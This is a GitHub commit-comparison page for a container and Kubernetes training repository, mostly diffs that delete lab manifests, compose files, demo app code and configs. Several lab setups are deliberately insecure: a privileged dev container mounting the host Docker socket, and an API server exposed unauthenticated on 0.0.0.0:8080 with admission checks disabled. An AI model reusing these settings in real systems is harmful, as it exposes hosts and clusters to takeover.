Compare commits

..

10 Commits

Author SHA1 Message Date
Jerome Petazzoni
8ef6219295 fix-redirects.sh: adding forced redirect 2020-04-07 16:48:42 -05:00
Bridget Kromhout
346ce0e15c Merge pull request #304 from bridgetkromhout/devopsdaysmsp2018
testing changes for 90min
2018-07-10 18:03:16 -05:00
Bridget Kromhout
964d936435 Merge branch 'devopsdaysmsp2018' into devopsdaysmsp2018 2018-07-10 07:47:09 -05:00
Bridget Kromhout
546d9a2986 Testing redirect 2018-07-10 07:45:55 -05:00
Bridget Kromhout
8e5d27b185 changing redirects back 2018-07-10 07:40:49 -05:00
Bridget Kromhout
e8d9e94b72 First pass at edits for 90min workshop 2018-07-10 07:37:39 -05:00
Bridget Kromhout
ca980de2fd Merge branch 'master' of github.com:bridgetkromhout/container.training into devopsdaysmsp2018 2018-07-10 07:36:05 -05:00
Bridget Kromhout
4b2b5ff7e4 Merge pull request #303 from jpetazzo/master
bringing branch up to date
2018-07-10 07:34:08 -05:00
Bridget Kromhout
64fb407e8c Merge pull request #299 from bridgetkromhout/devopsdaysmsp2018
devopsdays MSP 2018-specific stuff
2018-07-06 16:04:20 -05:00
Bridget Kromhout
ea4f46599d Adding devopsdays MSP 2018 2018-07-06 16:02:02 -05:00
906 changed files with 9079 additions and 127564 deletions


@@ -1,26 +0,0 @@
{
"name": "container.training environment to get started with Docker and/or Kubernetes",
"image": "ghcr.io/jpetazzo/shpod",
"features": {
//"ghcr.io/devcontainers/features/common-utils:2": {}
},
// Use 'forwardPorts' to make a list of ports inside the container available locally.
"forwardPorts": [],
//"postCreateCommand": "... install extra packages...",
"postStartCommand": "dind.sh ; kind.sh",
// This lets us use "docker-outside-docker".
// Unfortunately, minikube, kind, etc. don't work very well that way;
// so for now, we'll likely use "docker-in-docker" instead (with a
// privileged container). But we're still exposing that socket in case
// someone wants to do something interesting with it.
"mounts": ["source=/var/run/docker.sock,target=/var/run/docker-host.sock,type=bind"],
// This is for docker-in-docker.
"privileged": true,
// Uncomment to connect as root instead. More info: https://aka.ms/dev-containers-non-root.
"remoteUser": "k8s"
}
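A minimal sketch of what that "docker-outside-docker" socket enables, assuming the docker Python SDK is installed inside the dev container (the socket path comes from the "mounts" entry above; everything else here is illustrative):

import docker

# The dev container bind-mounts the host's Docker socket at
# /var/run/docker-host.sock (see the "mounts" entry above).
client = docker.DockerClient(base_url="unix:///var/run/docker-host.sock")

# These containers run on the *host* daemon, not inside the dev container.
for container in client.containers.list():
    print(container.name, container.image.tags)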

.gitignore

@@ -1,35 +1,13 @@
*.pyc
*.swp
*~
**/terraform.tfstate
**/terraform.tfstate.backup
prepare-labs/terraform/lab-environments
prepare-labs/terraform/many-kubernetes/one-kubernetes-config/config.tf
prepare-labs/terraform/many-kubernetes/one-kubernetes-module/*.tf
prepare-labs/terraform/tags
prepare-labs/terraform/virtual-machines/openstack/*.tfvars
prepare-labs/terraform/virtual-machines/proxmox/*.tfvars
prepare-labs/www
prepare-vms/ips.txt
prepare-vms/ips.html
prepare-vms/ips.pdf
prepare-vms/settings.yaml
prepare-vms/tags
slides/*.yml.html
slides/autopilot/state.yaml
slides/index.html
slides/past.html
slides/slides.zip
slides/_academy_*
slides/fragments
node_modules
### macOS ###
# General
.DS_Store
.AppleDouble
.LSOverride
### Windows ###
# Windows thumbnail cache files
Thumbs.db
ehthumbs.db
ehthumbs_vista.db


@@ -39,7 +39,7 @@ your own tutorials.
All these materials have been gathered in a single repository
because they have a few things in common:
- some [shared slides](slides/shared/) that are re-used
- some [common slides](slides/common/) that are re-used
(and updated) identically between different decks;
- a [build system](slides/) generating HTML slides from
Markdown source files;
@@ -199,7 +199,7 @@ this section is for you!
locked-down computer, host firewall, etc.
- Horrible wifi, or ssh port TCP/22 not open on network! If wifi sucks you
can try using MOSH https://mosh.org which handles SSH over UDP. TMUX can also
prevent you from losing your place if you get disconnected from servers.
prevent you from loosing your place if you get disconnected from servers.
https://tmux.github.io
- Forget to print "cards" and cut them up for handing out IP's.
- Forget to have fun and focus on your students!


@@ -1,9 +0,0 @@
hostname frr
router bgp 64512
network 1.0.0.2/32
bgp log-neighbor-changes
neighbor kube peer-group
neighbor kube remote-as 64512
neighbor kube route-reflector-client
bgp listen range 0.0.0.0/0 peer-group kube
log stdout


@@ -1,3 +0,0 @@
hostname frr
ip nht resolve-via-default
log stdout


@@ -1,40 +0,0 @@
version: "3"
services:
bgpd:
image: frrouting/frr:v8.2.2
volumes:
- ./conf:/etc/frr
- ./run:/var/run/frr
network_mode: host
cap_add:
- NET_ADMIN
- SYS_ADMIN
entrypoint: /usr/lib/frr/bgpd -f /etc/frr/bgpd.conf --log=stdout --log-level=debug --no_kernel --no_zebra
restart: always
zebra:
image: frrouting/frr:v8.2.2
volumes:
- ./conf:/etc/frr
- ./run:/var/run/frr
network_mode: host
cap_add:
- NET_ADMIN
- SYS_ADMIN
entrypoint: /usr/lib/frr/zebra -f /etc/frr/zebra.conf --log=stdout --log-level=debug
restart: always
vtysh:
image: frrouting/frr:v8.2.2
volumes:
- ./conf:/etc/frr
- ./run:/var/run/frr
network_mode: host
entrypoint: vtysh
chmod:
image: alpine
volumes:
- ./run:/var/run/frr
command: chmod 777 /var/run/frr


@@ -1,29 +0,0 @@
version: "3"
services:
pause:
ports:
- 8080:8080
image: k8s.gcr.io/pause
etcd:
network_mode: "service:pause"
image: k8s.gcr.io/etcd:3.4.9
command: etcd
kube-apiserver:
network_mode: "service:pause"
image: k8s.gcr.io/hyperkube:v1.18.8
command: kube-apiserver --etcd-servers http://127.0.0.1:2379 --address 0.0.0.0 --disable-admission-plugins=ServiceAccount --allow-privileged
kube-controller-manager:
network_mode: "service:pause"
image: k8s.gcr.io/hyperkube:v1.18.8
command: kube-controller-manager --master http://localhost:8080 --allocate-node-cidrs --cluster-cidr=10.CLUSTER.0.0/16
"Edit the CLUSTER placeholder first. Then, remove this line.":
kube-scheduler:
network_mode: "service:pause"
image: k8s.gcr.io/hyperkube:v1.18.8
command: kube-scheduler --master http://localhost:8080


@@ -1,128 +0,0 @@
---
apiVersion: |+
Make sure you update the line with --master=http://X.X.X.X:8080 below.
Then remove this section from this YAML file and try again.
---
apiVersion: v1
kind: ConfigMap
metadata:
name: kube-router-cfg
namespace: kube-system
labels:
k8s-app: kube-router
data:
cni-conf.json: |
{
"cniVersion":"0.3.0",
"name":"mynet",
"plugins":[
{
"name":"kubernetes",
"type":"bridge",
"bridge":"kube-bridge",
"isDefaultGateway":true,
"ipam":{
"type":"host-local"
}
}
]
}
---
apiVersion: apps/v1
kind: DaemonSet
metadata:
labels:
k8s-app: kube-router
name: kube-router
namespace: kube-system
spec:
selector:
matchLabels:
k8s-app: kube-router
template:
metadata:
labels:
k8s-app: kube-router
annotations:
scheduler.alpha.kubernetes.io/critical-pod: ''
spec:
serviceAccountName: kube-router
containers:
- name: kube-router
image: docker.io/cloudnativelabs/kube-router
imagePullPolicy: Always
args:
- "--run-router=true"
- "--run-firewall=true"
- "--run-service-proxy=true"
- "--master=http://X.X.X.X:8080"
env:
- name: NODE_NAME
valueFrom:
fieldRef:
fieldPath: spec.nodeName
- name: KUBE_ROUTER_CNI_CONF_FILE
value: /etc/cni/net.d/10-kuberouter.conflist
livenessProbe:
httpGet:
path: /healthz
port: 20244
initialDelaySeconds: 10
periodSeconds: 3
resources:
requests:
cpu: 250m
memory: 250Mi
securityContext:
privileged: true
volumeMounts:
- name: lib-modules
mountPath: /lib/modules
readOnly: true
- name: cni-conf-dir
mountPath: /etc/cni/net.d
initContainers:
- name: install-cni
image: busybox
imagePullPolicy: Always
command:
- /bin/sh
- -c
- set -e -x;
if [ ! -f /etc/cni/net.d/10-kuberouter.conflist ]; then
if [ -f /etc/cni/net.d/*.conf ]; then
rm -f /etc/cni/net.d/*.conf;
fi;
TMP=/etc/cni/net.d/.tmp-kuberouter-cfg;
cp /etc/kube-router/cni-conf.json ${TMP};
mv ${TMP} /etc/cni/net.d/10-kuberouter.conflist;
fi
volumeMounts:
- mountPath: /etc/cni/net.d
name: cni-conf-dir
- mountPath: /etc/kube-router
name: kube-router-cfg
hostNetwork: true
tolerations:
- key: CriticalAddonsOnly
operator: Exists
- effect: NoSchedule
key: node-role.kubernetes.io/master
operator: Exists
- effect: NoSchedule
key: node.kubernetes.io/not-ready
operator: Exists
volumes:
- name: lib-modules
hostPath:
path: /lib/modules
- name: cni-conf-dir
hostPath:
path: /etc/cni/net.d
- name: kube-router-cfg
configMap:
name: kube-router-cfg


@@ -1,31 +0,0 @@
# Note: hyperkube isn't available after Kubernetes 1.18.
# So we'll have to update this for Kubernetes 1.19!
version: "3"
services:
pause:
ports:
- 8080:8080
image: k8s.gcr.io/pause
etcd:
network_mode: "service:pause"
image: k8s.gcr.io/etcd:3.4.9
command: etcd
kube-apiserver:
network_mode: "service:pause"
image: k8s.gcr.io/hyperkube:v1.18.8
command: kube-apiserver --etcd-servers http://127.0.0.1:2379 --address 0.0.0.0 --disable-admission-plugins=ServiceAccount
kube-controller-manager:
network_mode: "service:pause"
image: k8s.gcr.io/hyperkube:v1.18.8
command: kube-controller-manager --master http://localhost:8080
kube-scheduler:
network_mode: "service:pause"
image: k8s.gcr.io/hyperkube:v1.18.8
command: kube-scheduler --master http://localhost:8080


@@ -1,72 +0,0 @@
# (1) Setting up a registry, and telling Tilt to use it.
# Tilt needs a registry to store images.
# The following manifest defines a Deployment to run a basic Docker registry,
# and a NodePort Service to access it. Using a NodePort means that we don't
# need to obtain a TLS certificate, because we will be accessing the registry
# through localhost.
k8s_yaml('../k8s/tilt-registry.yaml')
# Tell Tilt to use the registry that we just deployed instead of whatever
# is defined in our Kubernetes resources. Tilt will patch image names to
# use our registry.
default_registry('localhost:30555')
# Create a port forward so that we can access the registry from our local
# environment, too. Note that if you run Tilt directly from a Kubernetes node
# (which is not typical, but might happen in some lab/training environments)
# the following might cause an error because port 30555 is already taken.
k8s_resource(workload='tilt-registry', port_forwards='30555:5000')
# (2) Telling Tilt how to build and run our app.
# The following two lines will use the kubectl-build plugin
# to leverage buildkit and build the images in our Kubernetes
# cluster. This is not enabled by default, because it requires
# the plugin to be installed.
# See https://github.com/vmware-tanzu/buildkit-cli-for-kubectl
# for more information about this plugin.
#load('ext://kubectl_build', 'kubectl_build')
#docker_build = kubectl_build
# Our Kubernetes manifests use images 'dockercoins/...' so we tell Tilt
# how each of these images should be built. The first argument is the name
# of the image, the second argument is the directory containing the build
# context (i.e. the directory that contains the Dockerfile).
docker_build('dockercoins/hasher', 'hasher')
docker_build('dockercoins/rng', 'rng')
docker_build('dockercoins/webui', 'webui')
docker_build('dockercoins/worker', 'worker')
# The following manifest defines five Deployments and four Services for
# our application.
k8s_yaml('../k8s/dockercoins.yaml')
# (3) Finishing touches.
# The following line lets Tilt run with the default kubeadm cluster-admin context.
allow_k8s_contexts('kubernetes-admin@kubernetes')
# Note: the whole section below (to set up ngrok tunnels) is disabled,
# because ngrok now requires you to set up an account to serve HTML
# content. So we can still use ngrok for e.g. webhooks and "raw" APIs,
# but not to serve web pages like the Tilt UI.
# # This will run an ngrok tunnel to expose Tilt to the outside world.
# # This is intended to be used when Tilt runs on a remote machine.
# local_resource(name='ngrok:tunnel', serve_cmd='ngrok http 10350')
# # This will wait until the ngrok tunnel is up, and show its URL to the user.
# # We send the output to /dev/tty so that it doesn't get intercepted by
# # Tilt, and gets displayed to the user's terminal instead.
# # Note: this assumes that the ngrok instance will be running on port 4040.
# # If you have other ngrok instances running on the machine, this might not work.
# local_resource(name='ngrok:showurl', cmd='''
# while sleep 1; do
# TUNNELS=$(curl -fsSL http://localhost:4040/api/tunnels | jq -r .tunnels[].public_url)
# [ "$TUNNELS" ] && break
# done
# printf "\nYou should be able to connect to the Tilt UI with the following URL(s): %s\n" "$TUNNELS" >/dev/tty
# '''
# )
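For reference, the commented-out shell loop above could be approximated in Python; this is a sketch, not part of the Tiltfile, and it assumes the requests package plus ngrok's local inspection API on its default port 4040:

import time

import requests

# Poll ngrok's local inspection API until at least one tunnel is up.
while True:
    try:
        tunnels = requests.get("http://localhost:4040/api/tunnels").json()["tunnels"]
        if tunnels:
            break
    except requests.ConnectionError:
        pass
    time.sleep(1)

for tunnel in tunnels:
    print("You should be able to connect to the Tilt UI at:", tunnel["public_url"])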


@@ -1,24 +1,26 @@
services:
version: "2"
services:
rng:
build: rng
ports:
- "8001:80"
- "8001:80"
hasher:
build: hasher
ports:
- "8002:80"
- "8002:80"
webui:
build: webui
ports:
- "8000:80"
- "8000:80"
volumes:
- "./webui/files/:/files/"
- "./webui/files/:/files/"
redis:
image: redis
worker:
build: worker


@@ -1,8 +1,10 @@
FROM ruby:alpine
WORKDIR /app
RUN apk add --update build-base curl
RUN gem install sinatra --version '~> 3'
RUN gem install sinatra
RUN gem install thin
COPY hasher.rb .
CMD ["ruby", "hasher.rb", "-o", "::"]
ADD hasher.rb /
CMD ["ruby", "hasher.rb"]
EXPOSE 80
HEALTHCHECK \
--interval=1s --timeout=2s --retries=3 --start-period=1s \
CMD curl http://localhost/ || exit 1


@@ -2,6 +2,7 @@ require 'digest'
require 'sinatra'
require 'socket'
set :bind, '0.0.0.0'
set :port, 80
post '/' do


@@ -1,7 +1,5 @@
FROM python:alpine
WORKDIR /app
RUN pip install Flask
COPY rng.py .
ENV FLASK_APP=rng FLASK_RUN_HOST=:: FLASK_RUN_PORT=80
CMD ["flask", "run", "--without-threads"]
COPY rng.py /
CMD ["python", "rng.py"]
EXPOSE 80


@@ -28,5 +28,5 @@ def rng(how_many_bytes):
if __name__ == "__main__":
app.run(port=80)
app.run(host="0.0.0.0", port=80, threaded=False)


@@ -1,8 +1,7 @@
FROM node:23-alpine
WORKDIR /app
FROM node:4-slim
RUN npm install express
RUN npm install morgan
RUN npm install redis@5
COPY . .
RUN npm install redis
COPY files/ /files/
COPY webui.js /
CMD ["node", "webui.js"]
EXPOSE 80


@@ -13,7 +13,7 @@
color: royalblue;
}
</style>
<script src="jquery-1.11.3.min.js"></script>
<script src="jquery.js"></script>
<script src="d3.min.js"></script>
<script src="rickshaw.min.js"></script>
<script>

dockercoins/webui/files/jquery.js (symbolic link)

@@ -0,0 +1 @@
jquery-1.11.3.min.js


@@ -1,34 +1,26 @@
import express from 'express';
import morgan from 'morgan';
import { createClient } from 'redis';
var client = await createClient({
url: "redis://redis",
socket: {
family: 0
}
})
.on("error", function (err) {
console.error("Redis error", err);
})
.connect();
var express = require('express');
var app = express();
var redis = require('redis');
app.use(morgan('common'));
var client = redis.createClient(6379, 'redis');
client.on("error", function (err) {
console.error("Redis error", err);
});
app.get('/', function (req, res) {
res.redirect('/index.html');
});
app.get('/json', async(req, res) => {
var coins = await client.hLen('wallet');
var hashes = await client.get('hashes');
var now = Date.now() / 1000;
res.json({
coins: coins,
hashes: hashes,
now: now
app.get('/json', function (req, res) {
client.hlen('wallet', function (err, coins) {
client.get('hashes', function (err, hashes) {
var now = Date.now() / 1000;
res.json( {
coins: coins,
hashes: hashes,
now: now
});
});
});
});


@@ -1,6 +1,5 @@
FROM python:alpine
WORKDIR /app
RUN pip install redis
RUN pip install requests
COPY worker.py .
COPY worker.py /
CMD ["python", "worker.py"]


@@ -2,14 +2,14 @@ version: "2"
services:
elasticsearch:
image: elasticsearch:2
image: elasticsearch
# If you need to access ES directly, just uncomment those lines.
#ports:
# - "9200:9200"
# - "9300:9300"
logstash:
image: logstash:2
image: logstash
command: |
-e '
input {
@@ -47,7 +47,7 @@ services:
- "12201:12201/udp"
kibana:
image: kibana:4
image: kibana
ports:
- "5601:5601"
environment:


@@ -1,9 +0,0 @@
apiVersion: v1
kind: ConfigMap
metadata:
name: ingress-nginx-controller
namespace: ingress-nginx
data:
use-forwarded-headers: "true"
compute-full-forwarded-for: "true"
use-proxy-protocol: "true"


@@ -1,10 +0,0 @@
apiVersion: v1
kind: Namespace
metadata:
labels:
app.kubernetes.io/instance: flux-system
app.kubernetes.io/part-of: flux
app.kubernetes.io/version: v2.5.1
pod-security.kubernetes.io/warn: restricted
pod-security.kubernetes.io/warn-version: latest
name: ingress-nginx


@@ -1,12 +0,0 @@
apiVersion: kustomize.config.k8s.io/v1beta1
kind: Kustomization
resources:
- M6-ingress-nginx-components.yaml
- sync.yaml
patches:
- path: M6-ingress-nginx-cm-patch.yaml
target:
kind: ConfigMap
- path: M6-ingress-nginx-svc-patch.yaml
target:
kind: Service


@@ -1,8 +0,0 @@
apiVersion: v1
kind: Service
metadata:
name: ingress-nginx-controller
namespace: ingress-nginx
annotations:
service.beta.kubernetes.io/scw-loadbalancer-proxy-protocol-v2: "true"
service.beta.kubernetes.io/scw-loadbalancer-use-hostname: "true"


@@ -1,10 +0,0 @@
apiVersion: v1
kind: Namespace
metadata:
labels:
app.kubernetes.io/instance: flux-system
app.kubernetes.io/part-of: flux
app.kubernetes.io/version: v2.5.1
pod-security.kubernetes.io/warn: restricted
pod-security.kubernetes.io/warn-version: latest
name: kyverno


@@ -1,72 +0,0 @@
apiVersion: kyverno.io/v1
kind: ClusterPolicy
metadata:
name: flux-multi-tenancy
spec:
validationFailureAction: enforce
rules:
- name: serviceAccountName
exclude:
resources:
namespaces:
- flux-system
match:
resources:
kinds:
- Kustomization
- HelmRelease
validate:
message: ".spec.serviceAccountName is required"
pattern:
spec:
serviceAccountName: "?*"
- name: kustomizationSourceRefNamespace
exclude:
resources:
namespaces:
- flux-system
- ingress-nginx
- kyverno
- monitoring
- openebs
match:
resources:
kinds:
- Kustomization
preconditions:
any:
- key: "{{request.object.spec.sourceRef.namespace}}"
operator: NotEquals
value: ""
validate:
message: "spec.sourceRef.namespace must be the same as metadata.namespace"
deny:
conditions:
- key: "{{request.object.spec.sourceRef.namespace}}"
operator: NotEquals
value: "{{request.object.metadata.namespace}}"
- name: helmReleaseSourceRefNamespace
exclude:
resources:
namespaces:
- flux-system
- ingress-nginx
- kyverno
- monitoring
- openebs
match:
resources:
kinds:
- HelmRelease
preconditions:
any:
- key: "{{request.object.spec.chart.spec.sourceRef.namespace}}"
operator: NotEquals
value: ""
validate:
message: "spec.chart.spec.sourceRef.namespace must be the same as metadata.namespace"
deny:
conditions:
- key: "{{request.object.spec.chart.spec.sourceRef.namespace}}"
operator: NotEquals
value: "{{request.object.metadata.namespace}}"


@@ -1,29 +0,0 @@
apiVersion: v1
kind: Namespace
metadata:
labels:
app.kubernetes.io/instance: flux-system
app.kubernetes.io/part-of: flux
app.kubernetes.io/version: v2.5.1
pod-security.kubernetes.io/warn: restricted
pod-security.kubernetes.io/warn-version: latest
name: monitoring
---
apiVersion: networking.k8s.io/v1
kind: Ingress
metadata:
name: grafana
namespace: monitoring
spec:
ingressClassName: nginx
rules:
- host: grafana.test.metal.mybestdomain.com
http:
paths:
- path: /
pathType: Prefix
backend:
service:
name: kube-prometheus-stack-grafana
port:
number: 80


@@ -1,35 +0,0 @@
---
kind: NetworkPolicy
apiVersion: networking.k8s.io/v1
metadata:
name: deny-from-other-namespaces
spec:
podSelector: {}
ingress:
- from:
- podSelector: {}
---
kind: NetworkPolicy
apiVersion: networking.k8s.io/v1
metadata:
name: allow-webui
spec:
podSelector:
matchLabels:
app: web
ingress:
- from: []
---
kind: NetworkPolicy
apiVersion: networking.k8s.io/v1
metadata:
name: allow-db
spec:
podSelector:
matchLabels:
app: db
ingress:
- from:
- podSelector:
matchLabels:
app: web


@@ -1,10 +0,0 @@
apiVersion: v1
kind: Namespace
metadata:
labels:
app.kubernetes.io/instance: flux-system
app.kubernetes.io/part-of: flux
app.kubernetes.io/version: v2.5.1
pod-security.kubernetes.io/warn: restricted
pod-security.kubernetes.io/warn-version: latest
name: openebs


@@ -1,12 +0,0 @@
apiVersion: kustomize.config.k8s.io/v1beta1
kind: Kustomization
namespace: openebs
resources:
- M6-openebs-components.yaml
- sync.yaml
configMapGenerator:
- name: openebs-values
files:
- values.yaml=M6-openebs-values.yaml
configurations:
- M6-openebs-kustomizeconfig.yaml


@@ -1,6 +0,0 @@
nameReference:
- kind: ConfigMap
version: v1
fieldSpecs:
- path: spec/valuesFrom/name
kind: HelmRelease


@@ -1,15 +0,0 @@
# helm install openebs --namespace openebs openebs/openebs
# --set engines.replicated.mayastor.enabled=false
# --set lvm-localpv.lvmNode.kubeletDir=/var/lib/k0s/kubelet/
# --create-namespace
engines:
replicated:
mayastor:
enabled: false
# Needed for k0s install since kubelet install is slightly divergent from vanilla install >:-(
lvm-localpv:
lvmNode:
kubeletDir: /var/lib/k0s/kubelet/
localprovisioner:
hostpathClass:
isDefaultClass: true


@@ -1,38 +0,0 @@
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
namespace: rocky-test
name: rocky-full-access
rules:
- apiGroups: ["", extensions, apps]
resources: [deployments, replicasets, pods, services, ingresses, statefulsets]
verbs: [get, list, watch, create, update, patch, delete] # You can also use [*]
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
name: rocky-pv-access
rules:
- apiGroups: [""]
resources: [persistentvolumes]
verbs: [get, list, watch, create, patch]
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
labels:
toolkit.fluxcd.io/tenant: rocky
name: rocky-reconciler2
roleRef:
apiGroup: rbac.authorization.k8s.io
kind: ClusterRole
name: rocky-pv-access
subjects:
- apiGroup: rbac.authorization.k8s.io
kind: User
name: gotk:rocky-test:reconciler
- kind: ServiceAccount
name: rocky
namespace: rocky-test


@@ -1,19 +0,0 @@
apiVersion: networking.k8s.io/v1
kind: Ingress
metadata:
name: rocky
namespace: rocky-test
spec:
ingressClassName: nginx
rules:
- host: rocky.test.mybestdomain.com
http:
paths:
- path: /
pathType: Prefix
backend:
service:
name: web
port:
number: 80


@@ -1,8 +0,0 @@
apiVersion: kustomize.config.k8s.io/v1beta1
kind: Kustomization
resources:
- ../../base/rocky
patches:
- path: M6-rocky-test-patch.yaml
target:
kind: Kustomization


@@ -1,7 +0,0 @@
apiVersion: kustomize.toolkit.fluxcd.io/v1beta1
kind: Kustomization
metadata:
name: rocky
namespace: rocky-test
spec:
path: ./k8s/plain


@@ -1,8 +0,0 @@
k8s_yaml(helm(
"./path-to-chart", name="blue",
values=[], # Example: ["./path/to/values.yaml"]
set=[
"image.repository=jpetazzo/color",
"image.tag=latest",
]
))


@@ -1,16 +0,0 @@
apiVersion: apiserver.config.k8s.io/v1
kind: AdmissionConfiguration
plugins:
- name: PodSecurity
configuration:
apiVersion: pod-security.admission.config.k8s.io/v1alpha1
kind: PodSecurityConfiguration
defaults:
enforce: baseline
audit: baseline
warn: baseline
exemptions:
usernames:
- cluster-admin
namespaces:
- kube-system


@@ -1,33 +0,0 @@
---
apiVersion: apps/v1
kind: Deployment
metadata:
labels:
app: blue
name: blue
spec:
replicas: 1
selector:
matchLabels:
app: blue
template:
metadata:
labels:
app: blue
spec:
containers:
- image: jpetazzo/color
name: color
---
apiVersion: v1
kind: Service
metadata:
labels:
app: blue
name: blue
spec:
ports:
- name: "80"
port: 80
selector:
app: blue


@@ -1,21 +0,0 @@
apiVersion: networking.k8s.io/v1beta1
kind: Ingress
metadata:
name: whatever
annotations:
traefik.ingress.kubernetes.io/service-weights: |
whatever: 90%
whatever-new: 10%
spec:
rules:
- host: whatever.A.B.C.D.nip.io
http:
paths:
- path: /
backend:
serviceName: whatever
servicePort: 80
- path: /
backend:
serviceName: whatever-new
servicePort: 80


@@ -1,36 +0,0 @@
kind: Service
apiVersion: v1
metadata:
name: certbot
spec:
ports:
- port: 80
protocol: TCP
---
apiVersion: networking.k8s.io/v1
kind: Ingress
metadata:
name: certbot
spec:
rules:
- http:
paths:
- path: /.well-known/acme-challenge/
pathType: Prefix
backend:
service:
name: certbot
port:
number: 80
---
apiVersion: v1
kind: Endpoints
metadata:
name: certbot
subsets:
- addresses:
- ip: A.B.C.D
ports:
- port: 8000
protocol: TCP


@@ -1,11 +0,0 @@
apiVersion: cert-manager.io/v1
kind: Certificate
metadata:
name: xyz.A.B.C.D.nip.io
spec:
secretName: xyz.A.B.C.D.nip.io
dnsNames:
- xyz.A.B.C.D.nip.io
issuerRef:
name: letsencrypt-staging
kind: ClusterIssuer


@@ -1,18 +0,0 @@
apiVersion: cert-manager.io/v1
kind: ClusterIssuer
metadata:
name: letsencrypt-staging
spec:
acme:
# Remember to update this if you use this manifest to obtain real certificates :)
email: hello@example.com
server: https://acme-staging-v02.api.letsencrypt.org/directory
# To use the production environment, use the following line instead:
#server: https://acme-v02.api.letsencrypt.org/directory
privateKeySecretRef:
name: issuer-letsencrypt-staging
solvers:
- http01:
ingress:
class: traefik


@@ -1,18 +0,0 @@
# Note: apiextensions.k8s.io/v1beta1 is deprecated, and won't be served
# in Kubernetes 1.22 and later versions. This YAML manifest is here just
# for reference, but it's not intended to be used in modern trainings.
apiVersion: apiextensions.k8s.io/v1beta1
kind: CustomResourceDefinition
metadata:
name: coffees.container.training
spec:
group: container.training
version: v1alpha1
scope: Namespaced
names:
plural: coffees
singular: coffee
kind: Coffee
shortNames:
- cof


@@ -1,21 +0,0 @@
apiVersion: apiextensions.k8s.io/v1
kind: CustomResourceDefinition
metadata:
name: coffees.container.training
spec:
group: container.training
versions:
- name: v1alpha1
served: true
storage: true
schema:
openAPIV3Schema:
type: object
scope: Namespaced
names:
plural: coffees
singular: coffee
kind: Coffee
shortNames:
- cof


@@ -1,37 +0,0 @@
apiVersion: apiextensions.k8s.io/v1
kind: CustomResourceDefinition
metadata:
name: coffees.container.training
spec:
group: container.training
scope: Namespaced
names:
plural: coffees
singular: coffee
kind: Coffee
shortNames:
- cof
versions:
- name: v1alpha1
served: true
storage: true
schema:
openAPIV3Schema:
type: object
required: [ spec ]
properties:
spec:
type: object
properties:
taste:
description: Subjective taste of that kind of coffee bean
type: string
required: [ taste ]
additionalPrinterColumns:
- jsonPath: .spec.taste
description: Subjective taste of that kind of coffee bean
name: Taste
type: string
- jsonPath: .metadata.creationTimestamp
name: Age
type: date


@@ -1,34 +0,0 @@
---
kind: Coffee
apiVersion: container.training/v1alpha1
metadata:
name: arabica
spec:
taste: strong
---
kind: Coffee
apiVersion: container.training/v1alpha1
metadata:
name: excelsa
spec:
taste: fruity
---
kind: Coffee
apiVersion: container.training/v1alpha1
metadata:
name: liberica
spec:
taste: smoky
---
kind: Coffee
apiVersion: container.training/v1alpha1
metadata:
name: robusta
spec:
taste: stronger
bitterness: high
---
kind: Coffee
apiVersion: container.training/v1alpha1
metadata:
name: java
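A sketch of reading these custom resources programmatically, assuming the kubernetes Python client, one of the CRDs above already applied, and the coffees created in the "default" namespace (an assumption; adjust to taste):

from kubernetes import client, config

# Load credentials from ~/.kube/config (or load_incluster_config() in a pod).
config.load_kube_config()

api = client.CustomObjectsApi()
# group/version/plural match the coffees.container.training CRD above.
coffees = api.list_namespaced_custom_object(
    group="container.training",
    version="v1alpha1",
    namespace="default",
    plural="coffees",
)
for coffee in coffees["items"]:
    # "java" has no spec, so read it defensively.
    taste = coffee.get("spec", {}).get("taste", "unknown")
    print(coffee["metadata"]["name"], taste)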


@@ -1,78 +0,0 @@
# Basic Consul cluster using Cloud Auto-Join.
# Caveats:
# - no actual persistence
# - scaling down to 1 will break the cluster
# - pods may be colocated
---
apiVersion: v1
kind: ServiceAccount
metadata:
name: consul
---
apiVersion: rbac.authorization.k8s.io/v1
kind: Role
metadata:
name: consul
rules:
- apiGroups: [""]
resources:
- pods
verbs:
- get
- list
---
apiVersion: rbac.authorization.k8s.io/v1
kind: RoleBinding
metadata:
name: consul
roleRef:
apiGroup: rbac.authorization.k8s.io
kind: Role
name: consul
subjects:
- kind: ServiceAccount
name: consul
---
apiVersion: v1
kind: Service
metadata:
name: consul
spec:
ports:
- port: 8500
name: http
selector:
app: consul
---
apiVersion: apps/v1
kind: StatefulSet
metadata:
name: consul
spec:
serviceName: consul
replicas: 3
selector:
matchLabels:
app: consul
template:
metadata:
labels:
app: consul
spec:
serviceAccountName: consul
containers:
- name: consul
image: "consul:1.11"
env:
- name: NAMESPACE
valueFrom:
fieldRef:
fieldPath: metadata.namespace
args:
- "agent"
- "-bootstrap-expect=3"
- "-retry-join=provider=k8s label_selector=\"app=consul\" namespace=\"$(NAMESPACE)\""
- "-client=0.0.0.0"
- "-data-dir=/consul/data"
- "-server"
- "-ui"


@@ -1,89 +0,0 @@
# Better Consul cluster.
# There is still no actual persistence, but:
# - podAntiAffinity prevents pod colocation
# - the cluster works when scaling down to 1 (thanks to a lifecycle hook)
---
apiVersion: v1
kind: ServiceAccount
metadata:
name: consul
---
apiVersion: rbac.authorization.k8s.io/v1
kind: Role
metadata:
name: consul
rules:
- apiGroups: [""]
resources:
- pods
verbs:
- get
- list
---
apiVersion: rbac.authorization.k8s.io/v1
kind: RoleBinding
metadata:
name: consul
roleRef:
apiGroup: rbac.authorization.k8s.io
kind: Role
name: consul
subjects:
- kind: ServiceAccount
name: consul
---
apiVersion: v1
kind: Service
metadata:
name: consul
spec:
ports:
- port: 8500
name: http
selector:
app: consul
---
apiVersion: apps/v1
kind: StatefulSet
metadata:
name: consul
spec:
serviceName: consul
replicas: 3
selector:
matchLabels:
app: consul
template:
metadata:
labels:
app: consul
spec:
serviceAccountName: consul
affinity:
podAntiAffinity:
requiredDuringSchedulingIgnoredDuringExecution:
- labelSelector:
matchLabels:
app: consul
topologyKey: kubernetes.io/hostname
terminationGracePeriodSeconds: 10
containers:
- name: consul
image: "consul:1.11"
env:
- name: NAMESPACE
valueFrom:
fieldRef:
fieldPath: metadata.namespace
args:
- "agent"
- "-bootstrap-expect=3"
- "-retry-join=provider=k8s label_selector=\"app=consul\" namespace=\"$(NAMESPACE)\""
- "-client=0.0.0.0"
- "-data-dir=/consul/data"
- "-server"
- "-ui"
lifecycle:
preStop:
exec:
